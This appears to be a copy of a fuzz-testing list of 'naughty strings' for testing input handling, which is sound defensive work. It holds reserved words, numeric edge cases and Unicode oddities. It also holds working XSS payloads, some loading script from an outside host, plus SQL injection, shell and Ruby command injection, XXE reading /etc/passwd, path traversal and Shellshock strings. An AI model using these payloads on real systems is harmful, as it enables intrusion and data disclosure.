# Reserved Strings | |
# | |
# Strings which may be used elsewhere in code | |
undefined | |
undef | |
null | |
NULL | |
(null) | |
nil | |
NIL | |
true | |
false | |
True | |
False | |
TRUE | |
FALSE | |
None | |
hasOwnProperty | |
\ | |
\\ | |
# Numeric Strings | |
# | |
# Strings which can be interpreted as numeric | |
0 | |
1 | |
1.00 | |
$1.00 | |
1/2 | |
1E2 | |
1E02 | |
1E+02 | |
-1 | |
-1.00 | |
-$1.00 | |
-1/2 | |
-1E2 | |
-1E02 | |
-1E+02 | |
1/0 | |
0/0 | |
-2147483648/-1 | |
-9223372036854775808/-1 | |
-0 | |
-0.0 | |
+0 | |
+0.0 | |
0.00 | |
0..0 | |
. | |
0.0.0 | |
0,00 | |
0,,0 | |
, | |
0,0,0 | |
0.0/0 | |
1.0/0.0 | |
0.0/0.0 | |
1,0/0,0 | |
0,0/0,0 | |
--1 | |
- | |
-. | |
-, | |
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 | |
NaN | |
Infinity | |
-Infinity | |
INF | |
1#INF | |
-1#IND | |
1#QNAN | |
1#SNAN | |
1#IND | |
0x0 | |
0xffffffff | |
0xffffffffffffffff | |
0xabad1dea | |
123456789012345678901234567890123456789 | |
1,000.00 | |
1 000.00 | |
1'000.00 | |
1,000,000.00 | |
1 000 000.00 | |
1'000'000.00 | |
1.000,00 | |
1 000,00 | |
1'000,00 | |
1.000.000,00 | |
1 000 000,00 | |
1'000'000,00 | |
01000 | |
08 | |
09 | |
2.2250738585072011e-308 | |
# Special Characters | |
# | |
# ASCII punctuation. All of these characters may need to be escaped in some | |
# contexts. Divided into three groups based on (US-layout) keyboard position. | |
,./;'[]\-= | |
<>?:"{}|_+ | |
!@#$%^&*()`~ | |
# Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, | |
# and U+007F (DEL) | |
# Often forbidden to appear in various text-based file formats (e.g. XML), | |
# or reused for internal delimiters on the theory that they should never | |
# appear in input. | |
# The next line may appear to be blank or mojibake in some viewers. | |
��������������������������? | |
# Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. | |
# Commonly misinterpreted as additional graphic characters. | |
# The next line may appear to be blank, mojibake, or dingbats in some viewers. | |
| |
# Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode | |
# version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), | |
# and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often | |
# treated as whitespace in some contexts. | |
# This file unfortunately cannot express strings containing | |
# U+0000, U+000A, or U+000D (NUL, LF, CR). | |
# The next line may appear to be blank or mojibake in some viewers. | |
# The next line may be flagged for "trailing whitespace" in some viewers. | |
�� | |
# Unicode additional control characters: all of the characters with | |
# general category Cf (in Unicode 8.0.0). | |
# The next line may appear to be blank or mojibake in some viewers. | |
| |
# "Byte order marks", U+FEFF and U+FFFE, each on its own line. | |
# The next two lines may appear to be blank or mojibake in some viewers. | |
| |
� | |
# Unicode Symbols | |
# | |
# Strings which contain common unicode symbols (e.g. smart quotes) | |
Ω≈ç√∫˜µ≤≥÷ | |
åß∂ƒ©˙∆˚¬…æ | |
œ∑´®†¥¨ˆøπ“‘ | |
¡™£¢∞§¶•ªº–≠ | |
¸˛Ç◊ı˜Â¯˘¿ | |
ÅÍÎÏ˝ÓÔÒÚÆ☃ | |
Œ„´‰ˇÁ¨ˆØ∏”’ | |
`⁄€‹›fifl‡°·‚—± | |
⅛⅜⅝⅞ | |
ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя | |
٠١٢٣٤٥٦٧٨٩ | |
# Unicode Subscript/Superscript/Accents | |
# | |
# Strings which contain unicode subscripts/superscripts; can cause rendering issues | |
⁰⁴⁵ | |
₀₁₂ | |
⁰⁴⁵₀₁₂ | |
ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ | |
# Quotation Marks | |
# | |
# Strings which contain misplaced quotation marks; can cause encoding errors | |
' | |
" | |
"" | |
'"' | |
"'"'" | |
"'"'"'" | |
<foo val=“bar” /> | |
<foo val=“bar” /> | |
<foo val=”bar“ /> | |
<foo val=`bar' /> | |
# Two-Byte Characters | |
# | |
# Strings which contain two-byte characters: can cause rendering issues or character-length issues | |
田中さんにあげて下さい | |
パーティーへ行かないか | |
和製漢語 | |
部落格 | |
사회과학원 어학연구소 | |
찦차를 타고 온 펲시맨과 쑛다리 똠방각하 | |
社會科學院語學研究所 | |
울란바토르 | |
𠜎𠜱𠝹𠱓𠱸𠲖𠳏 | |
# Changing length when lowercased | |
# | |
# Characters which increase in length (2 to 3 bytes) when lowercased | |
# Credit: https://twitter.com/jifa/status/625776454479970304 | |
Ⱥ | |
Ⱦ | |
# Japanese Emoticons | |
# | |
# Strings which consists of Japanese-style emoticons which are popular on the web | |
ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ | |
(。◕ ∀ ◕。) | |
`ィ(´∀`∩ | |
__ロ(,_,*) | |
・( ̄∀ ̄)・:*: | |
゚・✿ヾ╲(。◕‿◕。)╱✿・゚ | |
,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ | |
(╯°□°)╯︵ ┻━┻) | |
(ノಥ益ಥ)ノ ┻━┻ | |
┬─┬ノ( º _ ºノ) | |
( ͡° ͜ʖ ͡°) | |
# Emoji | |
# | |
# Strings which contain Emoji; should be the same behavior as two-byte characters, but not always | |
😍 | |
👩🏽 | |
👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 | |
🐵 🙈 🙉 🙊 | |
❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 | |
✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 | |
🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 | |
0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 | |
# Regional Indicator Symbols | |
# | |
# Regional Indicator Symbols can be displayed differently across | |
# fonts, and have a number of special behaviors | |
🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 | |
🇺🇸🇷🇺🇸🇦🇫🇦🇲 | |
🇺🇸🇷🇺🇸🇦 | |
# Unicode Numbers | |
# | |
# Strings which contain unicode numbers; if the code is localized, it should see the input as numeric | |
123 | |
١٢٣ | |
# Right-To-Left Strings | |
# | |
# Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) | |
ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. | |
בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ | |
הָיְתָהtestالصفحات التّحول | |
﷽ | |
ﷺ | |
مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، | |
# Trick Unicode | |
# | |
# Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) | |
test | |
test | |
test | |
testtest | |
test | |
# Zalgo Text | |
# | |
# Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) | |
Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ | |
̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ | |
̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ | |
̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ | |
Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ | |
# Unicode Upsidedown | |
# | |
# Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com) | |
˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ | |
00˙Ɩ$- | |
# Unicode font | |
# | |
# Strings which contain bold/italic/etc. versions of normal characters | |
The quick brown fox jumps over the lazy dog | |
𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 | |
𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 | |
𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 | |
𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 | |
𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 | |
𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 | |
⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ | |
# Script Injection | |
# | |
# Strings which attempt to invoke a benign script injection; shows vulnerability to XSS | |
<script>alert(123)</script> | |
<script>alert('123');</script> | |
<img src=x onerror=alert(123) /> | |
<svg><script>123<1>alert(123)</script> | |
"><script>alert(123)</script> | |
'><script>alert(123)</script> | |
><script>alert(123)</script> | |
</script><script>alert(123)</script> | |
< / script >< script >alert(123)< / script > | |
onfocus=JaVaSCript:alert(123) autofocus | |
" onfocus=JaVaSCript:alert(123) autofocus | |
' onfocus=JaVaSCript:alert(123) autofocus | |
<script>alert(123)</script> | |
<sc<script>ript>alert(123)</sc</script>ript> | |
--><script>alert(123)</script> | |
";alert(123);t=" | |
';alert(123);t=' | |
JavaSCript:alert(123) | |
;alert(123); | |
src=JaVaSCript:prompt(132) | |
"><script>alert(123);</script x=" | |
'><script>alert(123);</script x=' | |
><script>alert(123);</script x= | |
" autofocus onkeyup="javascript:alert(123) | |
' autofocus onkeyup='javascript:alert(123) | |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
ABC DEF
| |
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> | |
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x22onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x09onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x00onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x27onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x20onerror=javascript:alert(1)> | |
"`'><script>\x3Bjavascript:alert(1)</script> | |
"`'><script>\x0Djavascript:alert(1)</script> | |
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x81javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x84javascript:alert(1)</script> | |
"`'><script>\xE3\x80\x80javascript:alert(1)</script> | |
"`'><script>\x09javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x89javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x85javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x88javascript:alert(1)</script> | |
"`'><script>\x00javascript:alert(1)</script> | |
"`'><script>\xE2\x80\xA8javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> | |
"`'><script>\xE1\x9A\x80javascript:alert(1)</script> | |
"`'><script>\x0Cjavascript:alert(1)</script> | |
"`'><script>\x2Bjavascript:alert(1)</script> | |
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> | |
"`'><script>-javascript:alert(1)</script> | |
"`'><script>\x0Ajavascript:alert(1)</script> | |
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> | |
"`'><script>\x7Ejavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x87javascript:alert(1)</script> | |
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\xA9javascript:alert(1)</script> | |
"`'><script>\xC2\x85javascript:alert(1)</script> | |
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x83javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> | |
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x80javascript:alert(1)</script> | |
"`'><script>\x21javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x82javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x86javascript:alert(1)</script> | |
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> | |
"`'><script>\x0Bjavascript:alert(1)</script> | |
"`'><script>\x20javascript:alert(1)</script> | |
"`'><script>\xC2\xA0javascript:alert(1)</script> | |
<img \x00src=x onerror="alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x11src=x onerror="javascript:alert(1)"> | |
<img \x12src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x10src=x onerror="javascript:alert(1)"> | |
<img\x13src=x onerror="javascript:alert(1)"> | |
<img\x32src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x11src=x onerror="javascript:alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x34src=x onerror="javascript:alert(1)"> | |
<img \x39src=x onerror="javascript:alert(1)"> | |
<img \x00src=x onerror="javascript:alert(1)"> | |
<img src\x09=x onerror="javascript:alert(1)"> | |
<img src\x10=x onerror="javascript:alert(1)"> | |
<img src\x13=x onerror="javascript:alert(1)"> | |
<img src\x32=x onerror="javascript:alert(1)"> | |
<img src\x12=x onerror="javascript:alert(1)"> | |
<img src\x11=x onerror="javascript:alert(1)"> | |
<img src\x00=x onerror="javascript:alert(1)"> | |
<img src\x47=x onerror="javascript:alert(1)"> | |
<img src=x\x09onerror="javascript:alert(1)"> | |
<img src=x\x10onerror="javascript:alert(1)"> | |
<img src=x\x11onerror="javascript:alert(1)"> | |
<img src=x\x12onerror="javascript:alert(1)"> | |
<img src=x\x13onerror="javascript:alert(1)"> | |
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> | |
<img src=x onerror=\x09"javascript:alert(1)"> | |
<img src=x onerror=\x10"javascript:alert(1)"> | |
<img src=x onerror=\x11"javascript:alert(1)"> | |
<img src=x onerror=\x12"javascript:alert(1)"> | |
<img src=x onerror=\x32"javascript:alert(1)"> | |
<img src=x onerror=\x00"javascript:alert(1)"> | |
<a href=javascript:javascript:alert(1)>XXX</a> | |
<img src="x` `<script>javascript:alert(1)</script>"` `> | |
<img src onerror /" '"= alt=javascript:alert(1)//"> | |
<title onpropertychange=javascript:alert(1)></title><title title=> | |
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> | |
<script src="/\%(jscript)s"></script> | |
<script src="\\%(jscript)s"></script> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC=# onmouseover="alert('xxs')"> | |
<IMG SRC= onmouseover="alert('xxs')"> | |
<IMG onmouseover="alert('xxs')"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out | |
<IMG SRC="  javascript:alert('XSS');"> | |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
\";alert('XSS');// | |
Copy me | |
Scroll over me | |
<plaintext> | |
http://a/%%30%30 | |
</textarea><script>alert(123)</script> | |
# SQL Injection | |
# | |
# Strings which can cause a SQL injection if inputs are not sanitized | |
1;DROP TABLE users | |
1'; DROP TABLE users-- 1 | |
' OR 1=1 -- 1 | |
' OR '1'='1 | |
% | |
_ | |
# Server Code Injection | |
# | |
# Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) | |
- | |
-- | |
--version | |
--help | |
$USER | |
/dev/null; touch /tmp/blns.fail ; echo | |
`touch /tmp/blns.fail` | |
$(touch /tmp/blns.fail) | |
@{[system "touch /tmp/blns.fail"]} | |
# Command Injection (Ruby) | |
# | |
# Strings which can call system commands within Ruby/Rails applications | |
eval("puts 'hello world'") | |
System("ls -al /") | |
`ls -al /` | |
Kernel.exec("ls -al /") | |
Kernel.exit(1) | |
%x('ls -al /') | |
# XXE Injection (XML) | |
# | |
# String which can reveal system files when parsed by a badly configured XML parser | |
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> | |
# Unwanted Interpolation | |
# | |
# Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. | |
$HOME | |
$ENV{'HOME'} | |
%d | |
%s | |
{0} | |
%*.*s | |
File:/// | |
# File Inclusion | |
# | |
# Strings which can cause user to pull in files that should not be a part of a web server | |
../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../etc/hosts | |
# Known CVEs and Vulnerabilities | |
# | |
# Strings that test for known vulnerabilities | |
() { 0; }; touch /tmp/blns.shellshock1.fail; | |
() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; } | |
<<< %s(un='%s') = %u | |
+++ATH0 | |
# MSDOS/Windows Special Filenames | |
# | |
# Strings which are reserved characters in MSDOS/Windows | |
CON | |
PRN | |
AUX | |
CLOCK$ | |
NUL | |
A: | |
ZZ: | |
COM1 | |
LPT1 | |
LPT2 | |
LPT3 | |
COM2 | |
COM3 | |
COM4 | |
# IRC specific strings | |
# | |
# Strings that may occur on IRC clients that make security products freak out | |
DCC SEND STARTKEYLOGGER 0 0 0 | |
# Scunthorpe Problem | |
# | |
# Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) | |
Scunthorpe General Hospital | |
Penistone Community Church | |
Lightwater Country Park | |
Jimmy Clitheroe | |
Horniman Museum | |
shitake mushrooms | |
RomansInSussex.co.uk | |
http://www.cum.qc.ca/ | |
Craig Cockburn, Software Specialist | |
Linda Callahan | |
Dr. Herman I. Libshitz | |
magna cum laude | |
Super Bowl XXX | |
medieval erection of parapets | |
evaluate | |
mocha | |
expression | |
Arsenal canal | |
classic | |
Tyson Gay | |
Dick Van Dyke | |
basement | |
# Human injection | |
# | |
# Strings which may cause human to reinterpret worldview | |
